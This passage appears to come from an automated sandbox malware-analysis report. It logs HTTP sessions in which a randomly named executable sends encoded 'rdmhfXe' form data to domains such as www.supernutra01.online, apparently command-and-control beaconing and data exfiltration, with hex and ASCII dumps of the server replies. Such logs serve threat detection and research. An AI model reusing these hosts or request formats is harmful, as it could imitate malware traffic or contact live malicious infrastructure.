                                                  Jan 10, 2025 20:11:14.143189907 CET | 445 | OUT | GET /6pwo/?rdmhfXe=OcYLCa3XOMtt+Rsv8j1JEBYyKSs2FBnaDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abiRcuJlWrvFsYiciiVw8Ks4AYAtrm9w==&AF=At8pGDY0Z HTTP/1.1
                                                  Host: www.1secondlending.one
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Jan 10, 2025 20:11:14.981031895 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:14 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 548
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  5 | 192.168.2.9 | 64519 | 188.114.97.3 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 10, 2025 20:11:20.030328989 CET | 724 | OUT | POST /rk61/ HTTP/1.1
                                                  Host: www.supernutra01.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 196
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.supernutra01.online
                                                  Referer: http://www.supernutra01.online/rk61/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 31 4c 32 50 35 58 56 74 76 35 41 79 46 35 50 6e 72 62 43 54 6c 58 44 4c 36 6e 5a 47 4d 74 74 6f 45 73 39 75 79 4f 47 74 48 4f 59 70 6c 34 44 41 6a 7a 36 53 53 49 2f 69 58 42 75 30 71 41 71 2b 70 47 5a 57 2b 57 34 70 39 6e 63 50 42 62 62 64 37 35 51 49 51 6d 52 52 34 68 69 41 2f 6c 6c 7a 49 69 47 4b 2b 6c 4a 5a 4b 69 67 30 48 4f 49 76 46 36 34 6b 2f 4e 6e 36 69 4c 6d 73 5a 6c 44 35 47 4f 31 7a 33 48 37 69 66 74 53 31 44 71 33 4c 6e 57 74 36 45 53 75 55 6d 42 50 62 68 4f 6e 44 71 2b 5a 2b 48 48 6c 4d 63 65 66 57 78 59 64 57 41 2f 74 63 51 35 6c 32 6e 52 53 31
                                                  Data Ascii: rdmhfXe=1L2P5XVtv5AyF5PnrbCTlXDL6nZGMttoEs9uyOGtHOYpl4DAjz6SSI/iXBu0qAq+pGZW+W4p9ncPBbbd75QIQmRR4hiA/llzIiGK+lJZKig0HOIvF64k/Nn6iLmsZlD5GO1z3H7iftS1Dq3LnWt6ESuUmBPbhOnDq+Z+HHlMcefWxYdWA/tcQ5l2nRS1
                                                  Jan 10, 2025 20:11:20.709923029 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                  Date: Fri, 10 Jan 2025 19:11:20 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qzmw2iSHWoQna6S3A8h64mxO00eU51PIDVhyqFgCcHZtfNmv9tEdmzJ52BDZ3EteV5NkKgSgOUIyEQukkuILY%2Bqh0cvN4B%2FwGuxEfiYsJHdlzVFK2RjKFms8u8RdV%2F8PrUyh1zAgssbeCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ffef8e8af8043a5-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1612&rtt_var=806&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disa
                                                  Jan 10, 2025 20:11:20.709943056 CET | 119 | IN | Data Raw: 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                  Data Ascii: ble MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  6 | 192.168.2.9 | 64520 | 188.114.97.3 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 10, 2025 20:11:22.572251081 CET | 748 | OUT | POST /rk61/ HTTP/1.1
                                                  Host: www.supernutra01.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 220
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.supernutra01.online
                                                  Referer: http://www.supernutra01.online/rk61/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 31 4c 32 50 35 58 56 74 76 35 41 79 45 5a 2f 6e 74 36 43 54 67 33 44 49 6d 33 5a 47 43 4e 74 73 45 73 78 75 79 4c 69 39 48 34 41 70 6c 64 2f 41 69 79 36 53 52 49 2f 69 66 68 75 74 30 77 71 44 70 47 64 65 2b 53 34 70 39 6a 30 50 42 66 58 64 37 4b 34 58 42 6d 52 66 78 42 69 56 69 56 6c 7a 49 69 47 4b 2b 6a 6c 2f 4b 69 6f 30 47 2b 34 76 58 76 59 6c 6a 64 6e 35 31 37 6d 73 64 6c 44 39 47 4f 31 56 33 46 65 48 66 75 71 31 44 76 4c 4c 70 6a 42 35 4c 53 75 53 37 78 4f 2f 78 63 6e 4c 68 4f 31 7a 49 42 78 72 45 2b 54 58 32 35 68 49 52 4e 6b 48 46 75 6c 52 67 32 62 64 37 45 76 4c 71 6e 61 6d 39 32 6f 38 6f 56 58 30 51 6a 58 4f 66 77 3d 3d
                                                  Data Ascii: rdmhfXe=1L2P5XVtv5AyEZ/nt6CTg3DIm3ZGCNtsEsxuyLi9H4Apld/Aiy6SRI/ifhut0wqDpGde+S4p9j0PBfXd7K4XBmRfxBiViVlzIiGK+jl/Kio0G+4vXvYljdn517msdlD9GO1V3FeHfuq1DvLLpjB5LSuS7xO/xcnLhO1zIBxrE+TX25hIRNkHFulRg2bd7EvLqnam92o8oVX0QjXOfw==
                                                  Jan 10, 2025 20:11:23.244344950 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                  Date: Fri, 10 Jan 2025 19:11:23 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VuRmiHNNC%2BpjIkgYRoq6qz5RhQRZWIEkSG1UOPuzCyvrkEy6HPzPc62y0%2FoFgWdlZAERkhx%2BHu585m1AeEVEhdBu3trjZ2ATHIZstUcneOxv%2BTBs3YdwjidWfqeA3XB1dp6GVjTlO0uD5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ffef8f87ce64301-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1839&min_rtt=1839&rtt_var=919&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=748&delivery_rate=0&cwnd=55&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to dis
                                                  Jan 10, 2025 20:11:23.244364977 CET | 120 | IN | Data Raw: 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43
                                                  Data Ascii: able MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  7 | 192.168.2.9 | 64521 | 188.114.97.3 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 10, 2025 20:11:25.120523930 CET | 1761 | OUT | POST /rk61/ HTTP/1.1
                                                  Host: www.supernutra01.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 1232
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.supernutra01.online
                                                  Referer: http://www.supernutra01.online/rk61/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 31 4c 32 50 35 58 56 74 76 35 41 79 45 5a 2f 6e 74 36 43 54 67 33 44 49 6d 33 5a 47 43 4e 74 73 45 73 78 75 79 4c 69 39 48 34 49 70 6c 76 6e 41 6a 52 69 53 51 49 2f 69 56 42 75 77 30 77 71 53 70 47 6c 61 2b 53 39 53 39 6c 77 50 43 36 4c 64 39 37 34 58 49 6d 52 66 38 68 6a 79 2f 6c 6c 6d 49 69 57 4f 2b 6a 56 2f 4b 69 6f 30 47 39 67 76 48 4b 34 6c 68 64 6e 36 69 4c 6d 6f 5a 6c 44 5a 47 4f 74 72 33 46 62 79 44 4f 4b 31 44 50 37 4c 6c 78 35 35 47 53 75 51 72 68 4f 6e 78 63 71 56 68 4f 70 2f 49 42 74 52 45 38 44 58 31 50 46 55 4e 65 63 65 59 6f 68 56 72 42 72 56 7a 69 4c 31 71 32 37 41 68 44 4e 61 35 33 75 4c 64 53 6d 56 63 72 6e 6b 5a 48 30 75 49 53 35 56 52 52 54 4f 2b 54 57 77 31 4c 51 64 69 78 2b 6c 4b 62 55 2b 30 2b 4d 46 78 74 46 32 79 55 6e 4f 35 68 2b 44 4a 76 35 68 66 34 62 63 78 6c 5a 35 4f 54 72 55 4f 2f 71 79 30 4e 6b 77 31 6f 69 66 62 32 63 58 55 64 49 75 74 4c 6c 32 58 41 6c 52 76 64 61 32 65 2f 4a 66 63 62 6c 46 39 59 48 6c 7a 78 2b 56 69 6a 79 4a 66 41 78 5a 38 58 [TRUNCATED]
                                                  Data Ascii: rdmhfXe=1L2P5XVtv5AyEZ/nt6CTg3DIm3ZGCNtsEsxuyLi9H4IplvnAjRiSQI/iVBuw0wqSpGla+S9S9lwPC6Ld974XImRf8hjy/llmIiWO+jV/Kio0G9gvHK4lhdn6iLmoZlDZGOtr3FbyDOK1DP7Llx55GSuQrhOnxcqVhOp/IBtRE8DX1PFUNeceYohVrBrVziL1q27AhDNa53uLdSmVcrnkZH0uIS5VRRTO+TWw1LQdix+lKbU+0+MFxtF2yUnO5h+DJv5hf4bcxlZ5OTrUO/qy0Nkw1oifb2cXUdIutLl2XAlRvda2e/JfcblF9YHlzx+VijyJfAxZ8XxmxQPzZOZ4oulIsOOd7j3MMXh7K+1VyZxabsX248gTkW70v1FmtddmHRYff10kU2+f+gcD/vcDRoor/CGEJ2jPiGejvdHz3gyjhx0jC79xhVf+TnCGR38N6nTqsRcVT905r/T7JHFWY8lY1KSJPU4MW7WH35GTiB64fWXODpTETKdADoeZHwZ2WujWI/ZKFXmTPLvzHcSr9k0ONQgxqP5zGYOCNF7P7hxrE+BATUPdtPO1rSaYM8nZxtgMYuY7A9QERc9KuD7eP+yZJxYUAM6drzB2/ng/FdNdGgV9hmpf8whje1OcDhMAWb6uwO6VvWF9Fy//VZ376YVjk/hFgXMf1Ic2oqdgjTJ4/jTYE2O3SczpIWdNCxAEMZ87AysHYC4BGbR/z5aHTrx6C0feP/sPNdL0v7BNtaAft6s9clYh6fg4clisp8Wo9mTJARIRxxoq5lLMEdCu4dAcwVf4A7GJD+lcSJDKHcY/N16yhAE2v02HNRKInWWcwRSyixuX1+rffSIbpyfGhRCuAh3frPBZDXsofb2zYf/PBcEqVKhR0Z64gQ5Azb1609hFeqiA97lrUKtd7vu6ErlLHafMCV2rf7o5u7zqSmDhSf4I5GKICIJf9kzVvTrSsV5vSP3nWr8YTCZXfXS2jCojdoxLW6uqGyvc7CcNbVOA [TRUNCATED]
                                                  Jan 10, 2025 20:11:25.845640898 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                  Date: Fri, 10 Jan 2025 19:11:25 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U63tW9rf5%2BzeGccDaaT%2BUBmBq%2B5zYj62qAvC%2B%2FG0dpjZRFACWOR59PjSM2T86a4wewdoES%2FKYM3t1%2BZWz8W3YBvgmZ9FrEeQu9N5B%2F9j0Ut%2BTl2Fun%2FQpLVsu1I6OfyVStl2rh3u5BxGRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ffef908aff7de99-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=18636&min_rtt=18636&rtt_var=9318&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1761&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->...
                                                  Jan 10, 2025 20:11:25.845660925 CET | 132 | IN | Data Raw: 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64
                                                  Data Ascii: a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                  Jan 10, 2025 20:11:25.845868111 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  8 | 192.168.2.9 | 64522 | 188.114.97.3 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 10, 2025 20:11:27.662421942 CET | 446 | OUT | GET /rk61/?rdmhfXe=4Jev6jkxg6xEO7DVmJ20iETfs2t7f6dacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9IEZesAjm/l1NEB+do2leeTcUFeI7Uw==&AF=At8pGDY0Z HTTP/1.1
                                                  Host: www.supernutra01.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Jan 10, 2025 20:11:28.345433950 CET | 1236 | IN | HTTP/1.1 200 OK
                                                  Date: Fri, 10 Jan 2025 19:11:28 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                                                  Accept-Ranges: bytes
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wHR5dJwjBpwehrKt4hWAxs00QpCviou8EE7RQIB9GGrlxIDzCCJXRrYzTfcXXgcRj%2BqMFzVFVGXXMAWAUOBFWnYWnW5UXrvi4Oce5Q%2FV55mWDzcugspfiPHOlwbcPp4pMKdS6QudSN6zpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ffef9185dddef9f-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1975&rtt_var=987&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=446&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 [TRUNCATED]
                                                  Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,lab
                                                  Jan 10, 2025 20:11:28.345463037 CET | 1236 | IN | Data Raw: 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 6d 61 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 2c 2e 77 69 6e 64 6f 77 2d
                                                  Data Ascii: el{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-he
                                                  Jan 10, 2025 20:11:28.345477104 CET | 1236 | IN | Data Raw: 76 67 2d 6f 6e 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 34 30 70 78 3b 72 69 67 68 74 3a 2d 33 36 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 20 2e 73 76 67 2d 74 77 6f 7b
                                                  Data Ascii: vg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;line-heigh
